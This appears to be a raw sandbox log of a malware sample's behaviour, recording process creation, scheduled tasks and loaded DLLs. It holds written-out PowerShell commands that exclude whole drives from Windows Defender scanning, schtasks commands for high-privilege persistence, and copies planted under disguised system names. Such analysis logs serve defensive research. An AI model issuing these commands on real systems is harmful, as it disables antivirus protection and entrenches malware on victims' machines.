Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Wsj6fACaid.57.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 3XtEci4Mmo.exe | ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | File read: C:\Users\user\Desktop\3XtEci4Mmo.exe
Source: unknown | Process created: C:\Users\user\Desktop\3XtEci4Mmo.exe "C:\Users\user\Desktop\3XtEci4Mmo.exe"
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 13 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 9 /tr "'C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\conhost.exe'" /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\Recovery\conhost.exe C:\Recovery\conhost.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzk" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /f
Source: unknown | Process created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe "C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe"
Source: unknown | Process created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TezdDRgSgyeGDKRkzkT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\Chrome\Application\conhost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\conhost.exe "C:\Program Files\Google\Chrome\Application\conhost.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BO7Y63UfdW.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe "C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe "C:\Program Files (x86)\windows media player\Visualizations\TezdDRgSgyeGDKRkzk.exe"
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
